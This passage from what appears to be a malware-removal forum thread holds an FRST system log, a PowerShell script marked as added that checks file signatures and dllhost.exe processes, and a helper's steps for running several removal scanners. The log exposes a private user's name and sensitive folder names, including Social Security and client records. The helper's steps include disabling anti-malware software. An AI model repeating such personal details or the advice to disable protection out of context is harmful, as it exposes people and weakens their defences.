FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-07-10]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2012-08-31]
FF HKLM-x32\...\Firefox\Extensions: [{97E22097-9A2F-45b1-8DAF-36AD648C7EF4}] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
FF Extension: No Name - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext [2012-05-21]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn [2014-10-26]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF [2014-02-17]

Chrome:
=======
CHR HomePage: Default -> https://www.google.com/
CHR Profile: C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-12]
CHR Extension: (Norton Identity Safe) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-08-21]
CHR Extension: (RoboForm Lite Password Manager) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\kidhjpmgjfbkmcfpfakmdddddgfbhahj [2014-08-04]
CHR Extension: (Norton Security Toolbar) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2014-02-19]
CHR Extension: (Google Wallet) - C:\Users\Greg\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-19]
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-04]
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Chrome\Ext\rphtml5video.crx [2014-10-04]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-04]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 GsServer; C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe [8574096 2014-03-30] ()
R2 MbaeSvc; C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe [441144 2014-08-29] (Malwarebytes Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 MCLIENT; C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe [143928 2012-12-04] (Symantec Corporation)
R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2013-11-15] (Motorola Mobility LLC)
S3 MSSQL$MSSMLBIZ; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
R2 N360; C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\N360.exe [265040 2014-09-21] (Symantec Corporation)
R2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [289496 2013-11-28] (Realtek Semiconductor)
S3 B-Service; No ImagePath

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S1 A2DDA; No ImagePath
S0 amdkmafd; C:\Windows\System32\DRIVERS\amdkmafd.sys [21160 2013-10-16] (Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\Windows\System32\DRIVERS\amdkmpfd.sys [36096 2013-10-16] (Advanced Micro Devices, Inc.)
R1 BHDrvx64; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\BASHDefs\20141016.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_MCLIENT; C:\Windows\system32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [168096 2012-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2013-09-25] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
R1 ESProtectionDriver; C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae64.sys [63000 2014-08-30] ()
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [32512 2013-11-04] ()
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2013-10-23] (Intel Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\IPSDefs\20141021.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-26] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\VirusDefs\20141022.003\ENG64.SYS [129752 2014-08-21] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\VirusDefs\20141022.003\EX64.SYS [2137304 2014-08-21] (Symantec Corporation)
S3 RdpVideoMiniport; No ImagePath
S3 SmbDrv; C:\Windows\System32\DRIVERS\Smb_driver.sys [22800 2012-08-15] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [34544 2013-10-16] (Synaptics Incorporated)
R3 SRTSP; C:\Windows\System32\Drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16152 2014-10-26] ()
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2013-09-09] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-03-04] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-02-17] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-02-17] (Symantec Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 08:01 - 2014-10-26 08:01 - 00020642 _____ () C:\Users\Greg\Desktop\FRST.txt
2014-10-25 13:38 - 2014-10-25 13:37 - 00004738 _____ () C:\Users\Greg\Desktop\fixlist.txt
2014-10-25 13:38 - 2014-10-25 09:37 - 02112512 _____ (Farbar) C:\Users\Greg\Desktop\frst64.exe
2014-10-22 06:49 - 2014-10-26 08:01 - 00000000 ____D () C:\FRST
2014-10-22 00:31 - 2014-10-22 00:33 - 00000000 ____D () C:\AdwCleaner
2014-10-22 00:02 - 2014-10-25 22:19 - 00000000 ____D () C:\Users\Greg\Desktop\VirusCleanup
2014-10-21 15:04 - 2014-10-21 15:04 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Exploit.lnk
2014-10-21 15:04 - 2014-10-21 15:04 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Exploit
2014-10-21 12:23 - 2014-10-26 07:28 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-21 12:22 - 2014-10-21 15:01 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-21 12:22 - 2014-10-21 15:01 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-21 12:22 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-21 12:22 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-21 12:22 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-20 19:42 - 2014-10-20 20:31 - 00000000 ____D () C:\Users\Greg\AppData\Local\NPE
2014-10-16 11:01 - 2014-10-16 11:01 - 00001163 _____ () C:\SeagateAdapter
2014-10-15 17:38 - 2014-10-15 17:38 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-15 17:38 - 2014-10-15 17:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-15 17:38 - 2014-10-15 17:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-15 17:38 - 2014-10-15 17:38 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-15 14:42 - 2014-10-17 15:27 - 00000000 ____D () C:\Users\Greg\AppData\Local\American Enterprise
2014-10-15 14:41 - 2014-10-15 14:41 - 00000358 _____ () C:\Users\Greg\Desktop\Medico.appref-ms
2014-10-15 14:41 - 2014-10-15 14:41 - 00000000 ____D () C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\American Enterprise Group, Inc
2014-10-13 22:31 - 2014-10-13 22:31 - 00001627 _____ () C:\Users\Greg\Desktop\Clients_Medicare.csv
2014-10-13 16:10 - 2014-10-21 16:29 - 00000000 ____D () C:\Users\Greg\Documents\Pacific life
2014-10-04 09:50 - 2014-10-04 09:50 - 00000000 ____D () C:\Windows\System32\Tasks\Norton 360
2014-09-30 06:43 - 2014-09-30 06:43 - 00000000 ____D () C:\Users\Greg\Documents\Millionaire Series

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 07:50 - 2013-09-03 19:55 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-26 07:47 - 2011-07-14 16:02 - 00000000 ____D () C:\Users\Greg
2014-10-26 07:46 - 2014-02-04 15:00 - 00000556 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3448307080-1944955064-2909665858-1000.job
2014-10-26 07:41 - 2011-07-14 16:07 - 01870763 _____ () C:\Windows\WindowsUpdate.log
2014-10-26 07:35 - 2009-07-14 00:45 - 00013760 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-26 07:35 - 2009-07-14 00:45 - 00013760 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-26 07:28 - 2013-09-05 18:28 - 00016152 _____ () C:\Windows\system32\Drivers\SWDUMon.sys
2014-10-26 07:28 - 2013-09-05 18:28 - 00002840 _____ () C:\Windows\System32\Tasks\DriverUpdate Startup
2014-10-26 07:28 - 2013-09-05 18:28 - 00000416 _____ () C:\Windows\Tasks\DriverUpdate Startup.job
2014-10-26 07:28 - 2011-07-14 23:39 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-26 07:27 - 2013-01-20 11:25 - 00000000 ____D () C:\Temp
2014-10-26 07:27 - 2012-09-30 13:59 - 00000000 ____D () C:\Program Files\Google
2014-10-26 07:27 - 2011-09-30 08:15 - 02519744 _____ () C:\Windows\PFRO.log
2014-10-26 07:27 - 2011-09-27 10:54 - 25104101 _____ () C:\Windows\setupact.log
2014-10-26 07:27 - 2011-07-14 23:39 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-26 07:27 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-25 22:23 - 2013-12-12 22:11 - 00000000 ____D () C:\Users\Greg\AppData\Local\Google
2014-10-25 22:22 - 2014-05-29 11:10 - 00000000 ____D () C:\Users\Public\Documents\bc13SupportFiles
2014-10-25 22:22 - 2014-05-29 11:10 - 00000000 ____D () C:\Program Files (x86)\BenFit14
2014-10-25 22:19 - 2011-07-14 23:39 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-22 23:12 - 2012-11-15 16:02 - 00000000 ____D () C:\Users\Greg\AppData\Local\CrashDumps
2014-10-21 21:39 - 2009-07-14 01:08 - 00032576 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-21 21:15 - 2012-08-14 20:57 - 00000000 ____D () C:\Users\Greg\Documents\Outlook Files
2014-10-21 20:46 - 2012-09-30 09:49 - 00000000 ____D () C:\Users\Greg\AppData\Local\Deployment
2014-10-21 18:04 - 2012-06-14 14:55 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-21 15:58 - 2011-12-08 09:44 - 00000000 ____D () C:\Users\Greg\AppData\Local\join.me
2014-10-21 12:24 - 2009-07-14 01:13 - 00852346 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-21 10:28 - 2011-08-25 06:57 - 00000000 ____D () C:\Firefox
2014-10-21 09:33 - 2012-10-10 09:17 - 00000000 ____D () C:\Users\Greg\Finance
2014-10-20 20:36 - 2012-10-10 07:16 - 00000000 ____D () C:\Users\Greg\DVDs
2014-10-20 19:45 - 2013-01-11 19:50 - 00000000 ____D () C:\NPE
2014-10-20 16:53 - 2011-07-14 16:35 - 00844468 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-10-20 16:51 - 2013-08-15 03:00 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-20 10:16 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\7-BOOK OF BUSINESS
2014-10-20 09:56 - 2014-04-05 16:24 - 00000000 ____D () C:\Users\Greg\AppData\Roaming\GoodSync
2014-10-19 12:48 - 2012-10-09 22:38 - 00000000 ____D () C:\Users\Greg\Vacation
2014-10-18 11:00 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\3 INS CO LOGIN
2014-10-18 10:50 - 2012-11-07 16:05 - 00000000 ____D () C:\Users\Greg\Documents\CASE DESIGN
2014-10-18 07:22 - 2011-07-14 23:39 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-18 07:22 - 2011-07-14 23:39 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 15:26 - 2013-07-28 07:34 - 00000000 ____D () C:\Users\Greg\Documents\Retirement Planning
2014-10-17 14:21 - 2014-04-05 16:19 - 00000000 ____D () C:\Users\Greg\Robo Form
2014-10-17 11:07 - 2013-08-05 21:51 - 00000000 ____D () C:\Users\Greg\Documents\EquiTrust
2014-10-17 09:05 - 2014-05-14 08:51 - 00000000 ____D () C:\Users\Greg\Documents\Life Ins
2014-10-16 20:19 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\Advertising & Marketing
2014-10-16 17:03 - 2011-10-02 15:51 - 00002455 _____ () C:\Users\Greg\Documents\4 LEAD CO - Shortcut.lnk
2014-10-15 19:32 - 2014-02-19 17:31 - 00002102 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-15 17:38 - 2012-07-10 14:09 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-15 04:44 - 2013-01-20 11:23 - 00000000 ____D () C:\Users\Greg\AppData\Roaming\MotoCast
2014-10-15 03:27 - 2013-01-20 11:26 - 00000000 ____D () C:\Users\Greg\.gstreamer-0.10
2014-10-14 20:52 - 2014-04-05 14:03 - 00000000 ____D () C:\Users\Greg\Documents\001 Archive Folder
2014-10-14 18:48 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\Aetna Ind Health
2014-10-14 16:30 - 2012-09-04 14:12 - 00000000 ____D () C:\Users\Greg\Documents\State Licenses
2014-10-14 13:20 - 2014-02-04 15:00 - 00003578 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3448307080-1944955064-2909665858-1000
2014-10-14 12:13 - 2012-10-09 22:24 - 00000000 ____D () C:\Users\Greg\Cars & Cycles
2014-10-14 09:45 - 2014-04-02 17:53 - 00000214 _____ () C:\Users\Greg\Desktop\LPI Policies.url
2014-10-13 16:31 - 2012-06-22 09:30 - 00000000 ____D () C:\Users\Greg\AppData\Local\Downloaded Installations
2014-10-13 15:36 - 2013-03-12 21:47 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-10-13 15:36 - 2013-03-12 21:47 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-10-13 12:47 - 2013-11-29 17:53 - 00000000 ____D () C:\Users\Greg\1 - Read
2014-10-04 09:44 - 2013-08-07 20:35 - 00003238 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-10-04 09:44 - 2013-08-07 20:34 - 00000000 ____D () C:\Windows\system32\Drivers\N360x64
2014-10-04 08:41 - 2013-04-05 13:46 - 00000294 _____ () C:\Users\Greg\Desktop\Go Daddy Email.url
2014-10-03 10:59 - 2013-03-09 09:57 - 00000000 ____D () C:\Users\Greg\Documents\01 Read
2014-10-03 10:02 - 2011-07-14 16:41 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-02 21:35 - 2012-08-16 21:57 - 00000000 ____D () C:\Users\Greg\Documents\Vacation
2014-10-02 05:52 - 2014-08-26 13:36 - 00000000 ____D () C:\Users\Greg\Food Storage
2014-09-30 14:41 - 2014-09-05 14:22 - 00000000 ____D () C:\Users\Greg\Documents\Provident Trust
2014-09-30 12:09 - 2011-11-04 11:03 - 00000000 __SHD () C:\Users\Greg\Documents\cache
2014-09-30 11:00 - 2011-07-13 19:11 - 00000000 ____D () C:\Users\Greg\Documents\MEDICARE
2014-09-30 06:42 - 2014-05-09 15:09 - 00000000 ____D () C:\Users\Greg\Documents\Safe Money
2014-09-30 06:38 - 2011-09-29 10:02 - 00000000 ____D () C:\Users\Greg\Documents\Funeral Trusts - Legacy Safeguard & NGL
2014-09-30 06:31 - 2011-07-13 19:11 - 00000000 ____D () C:\Users\Greg\Documents\Client Contact List
2014-09-30 06:23 - 2014-01-29 14:09 - 00000000 ____D () C:\Users\Greg\Documents\APPS PENDING-14
2014-09-30 06:23 - 2013-12-09 18:31 - 00000000 ____D () C:\Users\Greg\Documents\HIX
2014-09-30 06:13 - 2012-07-20 12:34 - 00000000 ____D () C:\Users\Greg\Documents\ID Theft & Legal Shield
2014-09-26 12:43 - 2013-02-19 13:35 - 00000000 ____D () C:\Users\Greg\Documents\SOCIAL SECURITY

Some content of TEMP:
====================
C:\Users\Greg\AppData\Local\Temp\guninst.exe
C:\Users\Greg\AppData\Local\Temp\sqlite3.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite24165.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite55383.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite87103.dll
C:\Users\Greg\AppData\Local\Temp\UNINSTALL.EXE


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-16 00:49

==================== End Of Log ============================
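The "Bamital & volsnap Check" block in the log above verifies that a fixed list of core Windows binaries is still digitally signed, and the symptom that opened this thread was a swarm of "dllhost.exe *32" processes. The following PowerShell triage script is an added example, not part of the original post and not FRST's own code: it repeats the signature check with Get-AuthenticodeSignature on the same files plus both copies of dllhost.exe, then lists every running dllhost.exe with its parent process and command line and flags the ones that do not look like a normal COM Surrogate. It assumes an elevated PowerShell prompt on the affected Windows 7 x64 machine and standard paths under %SystemRoot%.

```powershell
# Added triage script (example only; not from the original thread or from FRST).
# Assumes an elevated PowerShell prompt on the affected Windows 7 x64 machine.

$sys = $env:SystemRoot

# Same files FRST checks in "Bamital & volsnap Check", plus both COM Surrogate binaries.
$files = @(
    "$sys\System32\winlogon.exe",
    "$sys\System32\wininit.exe",
    "$sys\SysWOW64\wininit.exe",
    "$sys\explorer.exe",
    "$sys\SysWOW64\explorer.exe",
    "$sys\System32\svchost.exe",
    "$sys\SysWOW64\svchost.exe",
    "$sys\System32\services.exe",
    "$sys\System32\user32.dll",
    "$sys\SysWOW64\user32.dll",
    "$sys\System32\userinit.exe",
    "$sys\SysWOW64\userinit.exe",
    "$sys\System32\rpcss.dll",
    "$sys\System32\drivers\volsnap.sys",
    "$sys\System32\dllhost.exe",
    "$sys\SysWOW64\dllhost.exe"
)

"=== Signature check ==="
foreach ($f in $files) {
    if (-not (Test-Path -LiteralPath $f)) { "{0} => MISSING" -f $f; continue }
    $sig = Get-AuthenticodeSignature -FilePath $f
    $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { "(no signer)" }
    # Valid: hash matches and the chain is trusted. HashMismatch: file was altered after signing.
    # NotSigned on a catalog-signed Windows file is inconclusive with PowerShell 2.0 (see note below).
    "{0} => {1} {2}" -f $f, $sig.Status, $signer
}

"`n=== Running dllhost.exe instances ==="
# A legitimate COM Surrogate is started by the DcomLaunch svchost.exe with "/Processid:{GUID}".
# Instances with a different parent, an unexpected path, or no /Processid argument need a closer look.
$expectedPath = '^' + [regex]::Escape($sys) + '\\(System32|SysWOW64)\\dllhost\.exe$'
$procs = Get-WmiObject -Class Win32_Process -Filter "Name='dllhost.exe'"
$rows = foreach ($p in $procs) {
    $parent = Get-WmiObject -Class Win32_Process -Filter ("ProcessId={0}" -f $p.ParentProcessId)
    $parentName = if ($parent) { $parent.Name } else { "(exited)" }
    $flag = @()
    if ($parentName -ne "svchost.exe") { $flag += "parent" }
    if ($p.CommandLine -notmatch '/Processid:\{') { $flag += "cmdline" }
    if ($p.ExecutablePath -notmatch $expectedPath) { $flag += "path" }
    New-Object PSObject -Property @{
        PID       = $p.ProcessId
        ParentPID = $p.ParentProcessId
        Parent    = $parentName
        Flags     = ($flag -join ",")
        Path      = $p.ExecutablePath
        CmdLine   = $p.CommandLine
    }
}
$rows | Select-Object PID, ParentPID, Parent, Flags, Path, CmdLine | Format-Table -AutoSize -Wrap
"Total dllhost.exe instances: {0}" -f @($procs).Count
```

Two caveats when reading the output. Many Windows binaries are catalog-signed rather than carrying an embedded signature, and the PowerShell 2.0 that ships with Windows 7 does not consult the security catalog, so NotSigned on a Windows file is inconclusive there; HashMismatch, or a signer other than Microsoft, is the result that matters, and Sysinternals sigcheck with -a can confirm a catalog signature. Second, a dllhost.exe instance whose parent has already exited, or whose command line lacks /Processid, is only a lead, not proof: note its PID, parent and command line and hand them to whoever is guiding the cleanup before killing anything.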

#9 B-boy/StyLe/

    Bleepin' Freestyler

  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  • Gender:Male
  • Location:Bulgaria
  • Local time:10:51 PM
Posted 26 October 2014 - 06:12 PM

Hello Sue,

Yeah, you should be OK to reconnect your computer to the internet since both logs are clean and the infection has been removed.

We can delete one adware extension for Firefox that I missed in the previous fix.

Please download the following file => and save it to the Desktop.
NOTE: It's important that both files, FRST and fixlist.txt, are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it in your reply.

However, although the malware has been removed, if you don't mind I want to make sure there is nothing lurking on the system, so just in case I want you to go through these steps:

Most of them should take no more than 5 minutes each (but the time they take to complete can vary depending on the size of your hard drive and the speed of your computer).

STEP 1

  • Please download RKill by Grinler from the link below and save it to your desktop.

    Rkill
  • Before we begin, you should disable any anti-malware software you have installed so it does not interfere with RKill running, as some anti-malware software detects RKill as malicious. Please refer to this page if you are not sure how.
  • Double-click on Rkill on your desktop to run it. (If you are using Windows Vista, please right-click on it and select Run As Administrator)
  • A black screen will appear and then disappear. Please do not worry, that is normal. This means that the tool has been successfully executed.
  • If nothing happens or if the tool does not run, please let me know in your next reply.
  • A log pops up at the end of the run. This log file is located at C:\rkill.log.
  • Please post the log in your next reply.

STEP 2

  • Please download RogueKillerx64.exe and save it to the desktop.
  • Close all windows and browsers.
  • Right-click the program and select 'Run as Administrator'.
  • Press the Scan button.
  • A report opens on the desktop named RKreport.txt.
  • Please copy and paste the results at pastebin.com and post the link to the log in your next reply.

STEP 3
 

 

Please download the latest version of TDSSKiller from here and save it to your Desktop.

  • Double-click on TDSSKiller.exe to run the application, then click on Change parameters.
  • Put a checkmark beside loaded modules.
  • A reboot will be needed to apply the changes. Do it.
  • TDSSKiller will launch automatically after the reboot. Also your computer may seem very slow and unusable. This is normal. Give it enough time to load your background programs.
  • Then click on Change parameters in TDSSKiller.
  • Check all boxes then click OK.
  • Click the Start Scan button.
  • The scan should take no longer than 2 minutes.
  • If a suspicious object is detected, the default action will be Skip, click on Continue.
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
    Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.
    Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
  • A report will be created in your root directory (usually the C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the results at pastebin.com and post the link to the log in your next reply.

STEP 4

Please download Malwarebytes Anti-Malware 2.0.3.1025 Final to your desktop.

  • Double-click mbam-setup-2.0.3.1025.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Settings tab > Detection and Protection subtab, Detection Options, tick the box 'Scan for rootkits'.
  • Click on the Scan tab, then click on Scan Now >> . If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • With some infections, you may see this message box.
    • 'Could not load DDA driver'
  • Click 'Yes' to this message, to allow the driver to load after a restart.
  • Allow the computer to restart. Continue with the rest of these instructions.
  • When the scan is complete, click Apply Actions.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

STEP 5

1. Please download HitmanPro.

  • For 32-bit Operating System
  • This is the mirror
  • For 64-bit Operating System
  • This is the mirror

2. Launch the program by double-clicking on the HitmanPro icon. (Windows Vista/7 users right-click on the HitmanPro icon and select Run as administrator.)

Note: If the program won't run, then open the program while holding down the left CTRL key until it is loaded.

3. Click on the next button. You must agree with the terms of the EULA (if asked).

4. Check the box beside "No, I only want to perform a one-time scan to check this computer".

5. Click on the next button.

6. The program will start to scan the computer. The scan will typically take no more than 2-3 minutes.

7. When the scan is done, click on the drop-down menu of the found entries (if any) and choose - Apply to all => Ignore <= IMPORTANT!!!

8. Click on the next button.

9. Click on the "Save Log" button.

10. Save that file to your desktop and post the content of that file in your next reply.

